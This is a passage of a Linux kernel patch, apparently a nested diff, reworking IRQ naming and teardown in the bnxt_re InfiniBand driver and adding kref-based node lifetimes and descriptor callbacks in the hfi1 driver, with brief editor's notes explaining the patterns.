++	struct ad7192_state *st = iio_priv(indio_dev);
+ 	bool rej60_en, refin2_en;
+ 	bool buf_en, bipolar, burnout_curr_en;
+ 	unsigned long long scale_uv;
+@@ -1078,7 +1078,7 @@ static int ad7192_probe(struct spi_device *spi)
+ 		}
+ 	}
+ 
+-	ret = ad7192_setup(st, spi->dev.of_node);
++	ret = ad7192_setup(indio_dev, spi->dev.of_node);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/infiniband/hw/bnxt_re/main.c b/drivers/infiniband/hw/bnxt_re/main.c
+index 8c0c80a8d3384..e58893387bb4d 100644
+--- a/drivers/infiniband/hw/bnxt_re/main.c
++++ b/drivers/infiniband/hw/bnxt_re/main.c
+@@ -333,15 +333,21 @@ static void bnxt_re_start_irq(void *handle, struct bnxt_msix_entry *ent)
+ 	for (indx = 0; indx < rdev->num_msix; indx++)
+ 		rdev->msix_entries[indx].vector = ent[indx].vector;
+ 
+-	bnxt_qplib_rcfw_start_irq(rcfw, msix_ent[BNXT_RE_AEQ_IDX].vector,
+-				  false);
++	rc = bnxt_qplib_rcfw_start_irq(rcfw, msix_ent[BNXT_RE_AEQ_IDX].vector,
++				       false);
++	if (rc) {
++		ibdev_warn(&rdev->ibdev, "Failed to reinit CREQ\n");
++		return;
++	}
+ 	for (indx = BNXT_RE_NQ_IDX ; indx < rdev->num_msix; indx++) {
+ 		nq = &rdev->nq[indx - 1];
+ 		rc = bnxt_qplib_nq_start_irq(nq, indx - 1,
+ 					     msix_ent[indx].vector, false);
+-		if (rc)
++		if (rc) {
+ 			ibdev_warn(&rdev->ibdev, "Failed to reinit NQ index %d\n",
+ 				   indx - 1);
++			return;
++		}
+ 	}
+ }
+ 
+@@ -1176,12 +1182,6 @@ static int bnxt_re_update_gid(struct bnxt_re_dev *rdev)
+ 	if (!ib_device_try_get(&rdev->ibdev))
+ 		return 0;
+ 
+-	if (!sgid_tbl) {
+-		ibdev_err(&rdev->ibdev, "QPLIB: SGID table not allocated");
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+ 	for (index = 0; index < sgid_tbl->active; index++) {
+ 		gid_idx = sgid_tbl->hw_id[index];
+ 
+@@ -1199,7 +1199,7 @@ static int bnxt_re_update_gid(struct bnxt_re_dev *rdev)
+ 		rc = bnxt_qplib_update_sgid(sgid_tbl, &gid, gid_idx,
+ 					    rdev->qplib_res.netdev->dev_addr);
+ 	}
+-out:
++
+ 	ib_device_put(&rdev->ibdev);
+ 	return rc;
+ }
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.c b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+index ab2cc1c67f70b..74d56900387a1 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+@@ -405,6 +405,9 @@ static irqreturn_t bnxt_qplib_nq_irq(int irq, void *dev_instance)
+ 
+ void bnxt_qplib_nq_stop_irq(struct bnxt_qplib_nq *nq, bool kill)
+ {
++	if (!nq->requested)
++		return;
++
+ 	tasklet_disable(&nq->nq_tasklet);
+ 	/* Mask h/w interrupt */
+ 	bnxt_qplib_ring_nq_db(&nq->nq_db.dbinfo, nq->res->cctx, false);
+@@ -412,11 +415,12 @@ void bnxt_qplib_nq_stop_irq(struct bnxt_qplib_nq *nq, bool kill)
+ 	synchronize_irq(nq->msix_vec);
+ 	if (kill)
+ 		tasklet_kill(&nq->nq_tasklet);
+-	if (nq->requested) {
+-		irq_set_affinity_hint(nq->msix_vec, NULL);
+-		free_irq(nq->msix_vec, nq);
+-		nq->requested = false;
+-	}
++
++	irq_set_affinity_hint(nq->msix_vec, NULL);
++	free_irq(nq->msix_vec, nq);
++	kfree(nq->name);
++	nq->name = NULL;
++	nq->requested = false;
+ }
+ 
+ void bnxt_qplib_disable_nq(struct bnxt_qplib_nq *nq)
+@@ -442,6 +446,7 @@ void bnxt_qplib_disable_nq(struct bnxt_qplib_nq *nq)
+ int bnxt_qplib_nq_start_irq(struct bnxt_qplib_nq *nq, int nq_indx,
+ 			    int msix_vector, bool need_init)
+ {
++	struct bnxt_qplib_res *res = nq->res;
+ 	int rc;
+ 
+ 	if (nq->requested)
+@@ -453,10 +458,17 @@ int bnxt_qplib_nq_start_irq(struct bnxt_qplib_nq *nq, int nq_indx,
+ 	else
+ 		tasklet_enable(&nq->nq_tasklet);
+ 
+-	snprintf(nq->name, sizeof(nq->name), "bnxt_qplib_nq-%d", nq_indx);
++	nq->name = kasprintf(GFP_KERNEL, "bnxt_re-nq-%d@pci:%s",
++			     nq_indx, pci_name(res->pdev));
++	if (!nq->name)
++		return -ENOMEM;
+ 	rc = request_irq(nq->msix_vec, bnxt_qplib_nq_irq, 0, nq->name, nq);
+-	if (rc)
++	if (rc) {
++		kfree(nq->name);
++		nq->name = NULL;
++		tasklet_disable(&nq->nq_tasklet);
+ 		return rc;
++	}
+ 
+ 	cpumask_clear(&nq->mask);
+ 	cpumask_set_cpu(nq_indx, &nq->mask);
+@@ -467,7 +479,7 @@ int bnxt_qplib_nq_start_irq(struct bnxt_qplib_nq *nq, int nq_indx,
+ 			 nq->msix_vec, nq_indx);
+ 	}
+ 	nq->requested = true;
+-	bnxt_qplib_ring_nq_db(&nq->nq_db.dbinfo, nq->res->cctx, true);
++	bnxt_qplib_ring_nq_db(&nq->nq_db.dbinfo, res->cctx, true);
+ 
+ 	return rc;
+ }
+@@ -1601,7 +1613,7 @@ static int bnxt_qplib_put_inline(struct bnxt_qplib_qp *qp,
+ 		il_src = (void *)wqe->sg_list[indx].addr;
+ 		t_len += len;
+ 		if (t_len > qp->max_inline_data)
+-			goto bad;
++			return -ENOMEM;
+ 		while (len) {
+ 			if (pull_dst) {
+ 				pull_dst = false;
+@@ -1625,8 +1637,6 @@ static int bnxt_qplib_put_inline(struct bnxt_qplib_qp *qp,
+ 	}
+ 
+ 	return t_len;
+-bad:
+-	return -ENOMEM;
+ }
+ 
+ static u32 bnxt_qplib_put_sges(struct bnxt_qplib_hwq *hwq,
+@@ -2056,7 +2066,7 @@ int bnxt_qplib_create_cq(struct bnxt_qplib_res *res, struct bnxt_qplib_cq *cq)
+ 	hwq_attr.sginfo = &cq->sg_info;
+ 	rc = bnxt_qplib_alloc_init_hwq(&cq->hwq, &hwq_attr);
+ 	if (rc)
+-		goto exit;
++		return rc;
+ 
+ 	RCFW_CMD_PREP(req, CREATE_CQ, cmd_flags);
+ 
+@@ -2097,7 +2107,6 @@ int bnxt_qplib_create_cq(struct bnxt_qplib_res *res, struct bnxt_qplib_cq *cq)
+ 
+ fail:
+ 	bnxt_qplib_free_hwq(res, &cq->hwq);
+-exit:
+ 	return rc;
+ }
+ 
+@@ -2725,11 +2734,8 @@ static int bnxt_qplib_cq_process_terminal(struct bnxt_qplib_cq *cq,
+ 
+ 	qp = (struct bnxt_qplib_qp *)((unsigned long)
+ 				      le64_to_cpu(hwcqe->qp_handle));
+-	if (!qp) {
+-		dev_err(&cq->hwq.pdev->dev,
+-			"FP: CQ Process terminal qp is NULL\n");
++	if (!qp)
+ 		return -EINVAL;
+-	}
+ 
+ 	/* Must block new posting of SQ and RQ */
+ 	qp->state = CMDQ_MODIFY_QP_NEW_STATE_ERR;
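
[Editor's note] A pattern worth noting in the NQ hunks above (the CREQ hunks further down repeat it): the fixed char[32] name becomes a kasprintf() allocation embedding pci_name(), and since request_irq() keeps using that string for as long as the handler is installed, every path pairs the allocation with a kfree(): once on the request_irq() failure path and once in the stop path, only after free_irq() has returned. Condensed (illustrative only):

	nq->name = kasprintf(GFP_KERNEL, "bnxt_re-nq-%d@pci:%s",
			     nq_indx, pci_name(res->pdev));
	if (!nq->name)
		return -ENOMEM;

	rc = request_irq(nq->msix_vec, bnxt_qplib_nq_irq, 0, nq->name, nq);
	if (rc) {
		kfree(nq->name);	/* request failed, string unused */
		nq->name = NULL;
		return rc;
	}

	/* ... and in the stop path ... */
	free_irq(nq->msix_vec, nq);	/* handler gone, string now idle */
	kfree(nq->name);
	nq->name = NULL;
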
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.h b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+index 0375019525431..f859710f9a7f4 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.h
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.h
+@@ -471,7 +471,7 @@ typedef int (*srqn_handler_t)(struct bnxt_qplib_nq *nq,
+ struct bnxt_qplib_nq {
+ 	struct pci_dev			*pdev;
+ 	struct bnxt_qplib_res		*res;
+-	char				name[32];
++	char				*name;
+ 	struct bnxt_qplib_hwq		hwq;
+ 	struct bnxt_qplib_nq_db		nq_db;
+ 	u16				ring_id;
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_rcfw.c b/drivers/infiniband/hw/bnxt_re/qplib_rcfw.c
+index 061b2895dd9b5..75e0c42f6f424 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_rcfw.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_rcfw.c
+@@ -181,7 +181,7 @@ static int __send_message(struct bnxt_qplib_rcfw *rcfw, struct cmdq_base *req,
+ 	} while (size > 0);
+ 	cmdq->seq_num++;
+ 
+-	cmdq_prod = hwq->prod;
++	cmdq_prod = hwq->prod & 0xFFFF;
+ 	if (test_bit(FIRMWARE_FIRST_FLAG, &cmdq->flags)) {
+ 		/* The very first doorbell write
+ 		 * is required to set this flag
+@@ -299,7 +299,8 @@ static int bnxt_qplib_process_func_event(struct bnxt_qplib_rcfw *rcfw,
+ }
+ 
+ static int bnxt_qplib_process_qp_event(struct bnxt_qplib_rcfw *rcfw,
+-				       struct creq_qp_event *qp_event)
++				       struct creq_qp_event *qp_event,
++				       u32 *num_wait)
+ {
+ 	struct creq_qp_error_notification *err_event;
+ 	struct bnxt_qplib_hwq *hwq = &rcfw->cmdq.hwq;
+@@ -308,6 +309,7 @@ static int bnxt_qplib_process_qp_event(struct bnxt_qplib_rcfw *rcfw,
+ 	u16 cbit, blocked = 0;
+ 	struct pci_dev *pdev;
+ 	unsigned long flags;
++	u32 wait_cmds = 0;
+ 	__le16  mcookie;
+ 	u16 cookie;
+ 	int rc = 0;
+@@ -367,9 +369,10 @@ static int bnxt_qplib_process_qp_event(struct bnxt_qplib_rcfw *rcfw,
+ 		crsqe->req_size = 0;
+ 
+ 		if (!blocked)
+-			wake_up(&rcfw->cmdq.waitq);
++			wait_cmds++;
+ 		spin_unlock_irqrestore(&hwq->lock, flags);
+ 	}
++	*num_wait += wait_cmds;
+ 	return rc;
+ }
+ 
+@@ -383,6 +386,7 @@ static void bnxt_qplib_service_creq(struct tasklet_struct *t)
+ 	struct creq_base *creqe;
+ 	u32 sw_cons, raw_cons;
+ 	unsigned long flags;
++	u32 num_wakeup = 0;
+ 
+ 	/* Service the CREQ until budget is over */
+ 	spin_lock_irqsave(&hwq->lock, flags);
+@@ -401,7 +405,8 @@ static void bnxt_qplib_service_creq(struct tasklet_struct *t)
+ 		switch (type) {
+ 		case CREQ_BASE_TYPE_QP_EVENT:
+ 			bnxt_qplib_process_qp_event
+-				(rcfw, (struct creq_qp_event *)creqe);
++				(rcfw, (struct creq_qp_event *)creqe,
++				 &num_wakeup);
+ 			creq->stats.creq_qp_event_processed++;
+ 			break;
+ 		case CREQ_BASE_TYPE_FUNC_EVENT:
+@@ -429,6 +434,8 @@ static void bnxt_qplib_service_creq(struct tasklet_struct *t)
+ 				      rcfw->res->cctx, true);
+ 	}
+ 	spin_unlock_irqrestore(&hwq->lock, flags);
++	if (num_wakeup)
++		wake_up_nr(&rcfw->cmdq.waitq, num_wakeup);
+ }
+ 
+ static irqreturn_t bnxt_qplib_creq_irq(int irq, void *dev_instance)
+@@ -598,7 +605,7 @@ int bnxt_qplib_alloc_rcfw_channel(struct bnxt_qplib_res *res,
+ 		rcfw->cmdq_depth = BNXT_QPLIB_CMDQE_MAX_CNT_8192;
+ 
+ 	sginfo.pgsize = bnxt_qplib_cmdqe_page_size(rcfw->cmdq_depth);
+-	hwq_attr.depth = rcfw->cmdq_depth;
++	hwq_attr.depth = rcfw->cmdq_depth & 0x7FFFFFFF;
+ 	hwq_attr.stride = BNXT_QPLIB_CMDQE_UNITS;
+ 	hwq_attr.type = HWQ_TYPE_CTX;
+ 	if (bnxt_qplib_alloc_init_hwq(&cmdq->hwq, &hwq_attr)) {
+@@ -635,6 +642,10 @@ void bnxt_qplib_rcfw_stop_irq(struct bnxt_qplib_rcfw *rcfw, bool kill)
+ 	struct bnxt_qplib_creq_ctx *creq;
+ 
+ 	creq = &rcfw->creq;
++
++	if (!creq->requested)
++		return;
++
+ 	tasklet_disable(&creq->creq_tasklet);
+ 	/* Mask h/w interrupts */
+ 	bnxt_qplib_ring_nq_db(&creq->creq_db.dbinfo, rcfw->res->cctx, false);
+@@ -643,10 +654,10 @@ void bnxt_qplib_rcfw_stop_irq(struct bnxt_qplib_rcfw *rcfw, bool kill)
+ 	if (kill)
+ 		tasklet_kill(&creq->creq_tasklet);
+ 
+-	if (creq->requested) {
+-		free_irq(creq->msix_vec, rcfw);
+-		creq->requested = false;
+-	}
++	free_irq(creq->msix_vec, rcfw);
++	kfree(creq->irq_name);
++	creq->irq_name = NULL;
++	creq->requested = false;
+ }
+ 
+ void bnxt_qplib_disable_rcfw_channel(struct bnxt_qplib_rcfw *rcfw)
+@@ -678,9 +689,11 @@ int bnxt_qplib_rcfw_start_irq(struct bnxt_qplib_rcfw *rcfw, int msix_vector,
+ 			      bool need_init)
+ {
+ 	struct bnxt_qplib_creq_ctx *creq;
++	struct bnxt_qplib_res *res;
+ 	int rc;
+ 
+ 	creq = &rcfw->creq;
++	res = rcfw->res;
+ 
+ 	if (creq->requested)
+ 		return -EFAULT;
+@@ -690,13 +703,22 @@ int bnxt_qplib_rcfw_start_irq(struct bnxt_qplib_rcfw *rcfw, int msix_vector,
+ 		tasklet_setup(&creq->creq_tasklet, bnxt_qplib_service_creq);
+ 	else
+ 		tasklet_enable(&creq->creq_tasklet);
++
++	creq->irq_name = kasprintf(GFP_KERNEL, "bnxt_re-creq@pci:%s",
++				   pci_name(res->pdev));
++	if (!creq->irq_name)
++		return -ENOMEM;
+ 	rc = request_irq(creq->msix_vec, bnxt_qplib_creq_irq, 0,
+-			 "bnxt_qplib_creq", rcfw);
+-	if (rc)
++			 creq->irq_name, rcfw);
++	if (rc) {
++		kfree(creq->irq_name);
++		creq->irq_name = NULL;
++		tasklet_disable(&creq->creq_tasklet);
+ 		return rc;
++	}
+ 	creq->requested = true;
+ 
+-	bnxt_qplib_ring_nq_db(&creq->creq_db.dbinfo, rcfw->res->cctx, true);
++	bnxt_qplib_ring_nq_db(&creq->creq_db.dbinfo, res->cctx, true);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_rcfw.h b/drivers/infiniband/hw/bnxt_re/qplib_rcfw.h
+index 0a3d8e7da3d42..b887e7fbad9ef 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_rcfw.h
++++ b/drivers/infiniband/hw/bnxt_re/qplib_rcfw.h
+@@ -174,6 +174,7 @@ struct bnxt_qplib_creq_ctx {
+ 	u16				ring_id;
+ 	int				msix_vec;
+ 	bool				requested; /* irq handler installed */
++	char				*irq_name;
+ };
+ 
+ /* RCFW Communication Channels */
+diff --git a/drivers/infiniband/hw/hfi1/ipoib_tx.c b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+index 8973a081d641e..e7d831330278d 100644
+--- a/drivers/infiniband/hw/hfi1/ipoib_tx.c
++++ b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+@@ -215,11 +215,11 @@ static int hfi1_ipoib_build_ulp_payload(struct ipoib_txreq *tx,
+ 		const skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
+ 
+ 		ret = sdma_txadd_page(dd,
+-				      NULL,
+ 				      txreq,
+ 				      skb_frag_page(frag),
+ 				      frag->bv_offset,
+-				      skb_frag_size(frag));
++				      skb_frag_size(frag),
++				      NULL, NULL, NULL);
+ 		if (unlikely(ret))
+ 			break;
+ 	}
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.c b/drivers/infiniband/hw/hfi1/mmu_rb.c
+index 71b9ac0188875..94f1701667301 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.c
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.c
+@@ -19,8 +19,7 @@ static int mmu_notifier_range_start(struct mmu_notifier *,
+ 		const struct mmu_notifier_range *);
+ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *,
+ 					   unsigned long, unsigned long);
+-static void do_remove(struct mmu_rb_handler *handler,
+-		      struct list_head *del_list);
++static void release_immediate(struct kref *refcount);
+ static void handle_remove(struct work_struct *work);
+ 
+ static const struct mmu_notifier_ops mn_opts = {
+@@ -103,7 +102,11 @@ void hfi1_mmu_rb_unregister(struct mmu_rb_handler *handler)
+ 	}
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	do_remove(handler, &del_list);
++	while (!list_empty(&del_list)) {
++		rbnode = list_first_entry(&del_list, struct mmu_rb_node, list);
++		list_del(&rbnode->list);
++		kref_put(&rbnode->refcount, release_immediate);
++	}
+ 
+ 	/* Now the mm may be freed. */
+ 	mmdrop(handler->mn.mm);
+@@ -131,12 +134,6 @@ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 	}
+ 	__mmu_int_rb_insert(mnode, &handler->root);
+ 	list_add_tail(&mnode->list, &handler->lru_list);
+-
+-	ret = handler->ops->insert(handler->ops_arg, mnode);
+-	if (ret) {
+-		__mmu_int_rb_remove(mnode, &handler->root);
+-		list_del(&mnode->list); /* remove from LRU list */
+-	}
+ 	mnode->handler = handler;
+ unlock:
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+@@ -180,6 +177,48 @@ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *handler,
+ 	return node;
+ }
+ 
++/*
++ * Must NOT call while holding mnode->handler->lock.
++ * mnode->handler->ops->remove() may sleep and mnode->handler->lock is a
++ * spinlock.
++ */
++static void release_immediate(struct kref *refcount)
++{
++	struct mmu_rb_node *mnode =
++		container_of(refcount, struct mmu_rb_node, refcount);
++	mnode->handler->ops->remove(mnode->handler->ops_arg, mnode);
++}
++
++/* Caller must hold mnode->handler->lock */
++static void release_nolock(struct kref *refcount)
++{
++	struct mmu_rb_node *mnode =
++		container_of(refcount, struct mmu_rb_node, refcount);
++	list_move(&mnode->list, &mnode->handler->del_list);
++	queue_work(mnode->handler->wq, &mnode->handler->del_work);
++}
++
++/*
++ * struct mmu_rb_node->refcount kref_put() callback.
++ * Adds mmu_rb_node to mmu_rb_node->handler->del_list and queues
++ * handler->del_work on handler->wq.
++ * Does not remove mmu_rb_node from handler->lru_list or handler->rb_root.
++ * Acquires mmu_rb_node->handler->lock; do not call while already holding
++ * handler->lock.
++ */
++void hfi1_mmu_rb_release(struct kref *refcount)
++{
++	struct mmu_rb_node *mnode =
++		container_of(refcount, struct mmu_rb_node, refcount);
++	struct mmu_rb_handler *handler = mnode->handler;
++	unsigned long flags;
++
++	spin_lock_irqsave(&handler->lock, flags);
++	list_move(&mnode->list, &mnode->handler->del_list);
++	spin_unlock_irqrestore(&handler->lock, flags);
++	queue_work(handler->wq, &handler->del_work);
++}
++
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ {
+ 	struct mmu_rb_node *rbnode, *ptr;
+@@ -194,6 +233,10 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 
+ 	spin_lock_irqsave(&handler->lock, flags);
+ 	list_for_each_entry_safe(rbnode, ptr, &handler->lru_list, list) {
++		/* refcount == 1: only mmu_rb_handler holds a ref to rbnode */
++		if (kref_read(&rbnode->refcount) > 1)
++			continue;
++
+ 		if (handler->ops->evict(handler->ops_arg, rbnode, evict_arg,
+ 					&stop)) {
+ 			__mmu_int_rb_remove(rbnode, &handler->root);
+@@ -206,7 +249,7 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+ 	list_for_each_entry_safe(rbnode, ptr, &del_list, list) {
+-		handler->ops->remove(handler->ops_arg, rbnode);
++		kref_put(&rbnode->refcount, release_immediate);
+ 	}
+ }
+ 
+@@ -218,7 +261,6 @@ static int mmu_notifier_range_start(struct mmu_notifier *mn,
+ 	struct rb_root_cached *root = &handler->root;
+ 	struct mmu_rb_node *node, *ptr = NULL;
+ 	unsigned long flags;
+-	bool added = false;
+ 
+ 	spin_lock_irqsave(&handler->lock, flags);
+ 	for (node = __mmu_int_rb_iter_first(root, range->start, range->end-1);
+@@ -227,38 +269,16 @@ static int mmu_notifier_range_start(struct mmu_notifier *mn,
+ 		ptr = __mmu_int_rb_iter_next(node, range->start,
+ 					     range->end - 1);
+ 		trace_hfi1_mmu_mem_invalidate(node->addr, node->len);
+-		if (handler->ops->invalidate(handler->ops_arg, node)) {
+-			__mmu_int_rb_remove(node, root);
+-			/* move from LRU list to delete list */
+-			list_move(&node->list, &handler->del_list);
+-			added = true;
+-		}
++		/* Remove from rb tree and lru_list. */
++		__mmu_int_rb_remove(node, root);
++		list_del_init(&node->list);
++		kref_put(&node->refcount, release_nolock);
+ 	}
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	if (added)
+-		queue_work(handler->wq, &handler->del_work);
+-
+ 	return 0;
+ }
+ 
+-/*
+- * Call the remove function for the given handler and the list.  This
+- * is expected to be called with a delete list extracted from handler.
+- * The caller should not be holding the handler lock.
+- */
+-static void do_remove(struct mmu_rb_handler *handler,
+-		      struct list_head *del_list)
+-{
+-	struct mmu_rb_node *node;
+-
+-	while (!list_empty(del_list)) {
+-		node = list_first_entry(del_list, struct mmu_rb_node, list);
+-		list_del(&node->list);
+-		handler->ops->remove(handler->ops_arg, node);
+-	}
+-}
+-
+ /*
+  * Work queue function to remove all nodes that have been queued up to
+  * be removed.  The key feature is that mm->mmap_lock is not being held
+@@ -271,11 +291,16 @@ static void handle_remove(struct work_struct *work)
+ 						del_work);
+ 	struct list_head del_list;
+ 	unsigned long flags;
++	struct mmu_rb_node *node;
+ 
+ 	/* remove anything that is queued to get removed */
+ 	spin_lock_irqsave(&handler->lock, flags);
+ 	list_replace_init(&handler->del_list, &del_list);
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	do_remove(handler, &del_list);
++	while (!list_empty(&del_list)) {
++		node = list_first_entry(&del_list, struct mmu_rb_node, list);
++		list_del(&node->list);
++		handler->ops->remove(handler->ops_arg, node);
++	}
+ }
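
[Editor's note] The mmu_rb.c hunks above converge on one lifetime rule: every user of an mmu_rb_node holds a reference, and the final kref_put() runs a release callback chosen to match the caller's context (release_immediate in process context, release_nolock while the handler lock is held, hfi1_mmu_rb_release otherwise). A single-threaded standalone model of that shape (the real kref is atomic; this model is not):

	#include <stdio.h>
	#include <stdlib.h>

	struct node {
		int refcount;
		const char *name;
	};

	static void release(struct node *n)
	{
		printf("releasing %s\n", n->name);
		free(n);
	}

	static void node_put(struct node *n, void (*rel)(struct node *))
	{
		if (--n->refcount == 0)
			rel(n);		/* only the last put releases */
	}

	int main(void)
	{
		struct node *n = malloc(sizeof(*n));

		if (!n)
			return 1;
		n->refcount = 1;	/* mirrors kref_init(): cache's ref */
		n->name = "rbnode";
		n->refcount++;		/* mirrors the extra "safety" kref */
		node_put(n, release);	/* drop safety ref: nothing freed */
		node_put(n, release);	/* cache drops its ref: release() */
		return 0;
	}
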
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.h b/drivers/infiniband/hw/hfi1/mmu_rb.h
+index ed75acdb7b839..dd2c4a0ae95b1 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.h
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.h
+@@ -16,6 +16,7 @@ struct mmu_rb_node {
+ 	struct rb_node node;
+ 	struct mmu_rb_handler *handler;
+ 	struct list_head list;
++	struct kref refcount;
+ };
+ 
+ /*
+@@ -51,6 +52,8 @@ int hfi1_mmu_rb_register(void *ops_arg,
+ void hfi1_mmu_rb_unregister(struct mmu_rb_handler *handler);
+ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 		       struct mmu_rb_node *mnode);
++void hfi1_mmu_rb_release(struct kref *refcount);
++
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg);
+ struct mmu_rb_node *hfi1_mmu_rb_get_first(struct mmu_rb_handler *handler,
+ 					  unsigned long addr,
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index bb2552dd29c1e..26c62162759ba 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -1593,7 +1593,20 @@ static inline void sdma_unmap_desc(
+ 	struct hfi1_devdata *dd,
+ 	struct sdma_desc *descp)
+ {
+-	system_descriptor_complete(dd, descp);
++	switch (sdma_mapping_type(descp)) {
++	case SDMA_MAP_SINGLE:
++		dma_unmap_single(&dd->pcidev->dev, sdma_mapping_addr(descp),
++				 sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	case SDMA_MAP_PAGE:
++		dma_unmap_page(&dd->pcidev->dev, sdma_mapping_addr(descp),
++			       sdma_mapping_len(descp), DMA_TO_DEVICE);
++		break;
++	}
++
++	if (descp->pinning_ctx && descp->ctx_put)
++		descp->ctx_put(descp->pinning_ctx);
++	descp->pinning_ctx = NULL;
+ }
+ 
+ /*
+@@ -3113,8 +3126,8 @@ int ext_coal_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx,
+ 
+ 		/* Add descriptor for coalesce buffer */
+ 		tx->desc_limit = MAX_DESC;
+-		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx,
+-					 addr, tx->tlen);
++		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, tx,
++					 addr, tx->tlen, NULL, NULL, NULL);
+ 	}
+ 
+ 	return 1;
+@@ -3157,9 +3170,9 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		SDMA_MAP_NONE,
+-		NULL,
+ 		dd->sdma_pad_phys,
+-		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)));
++		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)),
++		NULL, NULL, NULL);
+ 	tx->num_desc++;
+ 	_sdma_close_tx(dd, tx);
+ 	return rval;
+diff --git a/drivers/infiniband/hw/hfi1/sdma.h b/drivers/infiniband/hw/hfi1/sdma.h
+index 95aaec14c6c28..7fdebab202c4f 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.h
++++ b/drivers/infiniband/hw/hfi1/sdma.h
+@@ -594,9 +594,11 @@ static inline dma_addr_t sdma_mapping_addr(struct sdma_desc *d)
+ static inline void make_tx_sdma_desc(
+ 	struct sdma_txreq *tx,
+ 	int type,
+-	void *pinning_ctx,
+ 	dma_addr_t addr,
+-	size_t len)
++	size_t len,
++	void *pinning_ctx,
++	void (*ctx_get)(void *),
++	void (*ctx_put)(void *))
+ {
+ 	struct sdma_desc *desc = &tx->descp[tx->num_desc];
+ 
+@@ -613,7 +615,11 @@ static inline void make_tx_sdma_desc(
+ 				<< SDMA_DESC0_PHY_ADDR_SHIFT) |
+ 			(((u64)len & SDMA_DESC0_BYTE_COUNT_MASK)
+ 				<< SDMA_DESC0_BYTE_COUNT_SHIFT);
++
+ 	desc->pinning_ctx = pinning_ctx;
++	desc->ctx_put = ctx_put;
++	if (pinning_ctx && ctx_get)
++		ctx_get(pinning_ctx);
+ }
+ 
+ /* helper to extend txreq */
+@@ -645,18 +651,20 @@ static inline void _sdma_close_tx(struct hfi1_devdata *dd,
+ static inline int _sdma_txadd_daddr(
+ 	struct hfi1_devdata *dd,
+ 	int type,
+-	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	dma_addr_t addr,
+-	u16 len)
++	u16 len,
++	void *pinning_ctx,
++	void (*ctx_get)(void *),
++	void (*ctx_put)(void *))
+ {
+ 	int rval = 0;
+ 
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		type,
+-		pinning_ctx,
+-		addr, len);
++		addr, len,
++		pinning_ctx, ctx_get, ctx_put);
+ 	WARN_ON(len > tx->tlen);
+ 	tx->num_desc++;
+ 	tx->tlen -= len;
+@@ -676,11 +684,18 @@ static inline int _sdma_txadd_daddr(
+ /**
+  * sdma_txadd_page() - add a page to the sdma_txreq
+  * @dd: the device to use for mapping
+- * @pinning_ctx: context to be released at descriptor retirement
+  * @tx: tx request to which the page is added
+  * @page: page to map
+  * @offset: offset within the page
+  * @len: length in bytes
++ * @pinning_ctx: context to be stored in struct sdma_desc .pinning_ctx. Not
++ *               added if a coalesce buffer is used, e.g. a pointer to a
++ *               pinned-page cache entry for the sdma_desc.
++ * @ctx_get: optional function to take reference to @pinning_ctx. Not called if
++ *           @pinning_ctx is NULL.
++ * @ctx_put: optional function to release reference to @pinning_ctx after
++ *           sdma_desc completes. May be called in interrupt context so must
++ *           not sleep. Not called if @pinning_ctx is NULL.
+  *
+  * This is used to add a page/offset/length descriptor.
+  *
+@@ -692,11 +707,13 @@ static inline int _sdma_txadd_daddr(
+  */
+ static inline int sdma_txadd_page(
+ 	struct hfi1_devdata *dd,
+-	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	struct page *page,
+ 	unsigned long offset,
+-	u16 len)
++	u16 len,
++	void *pinning_ctx,
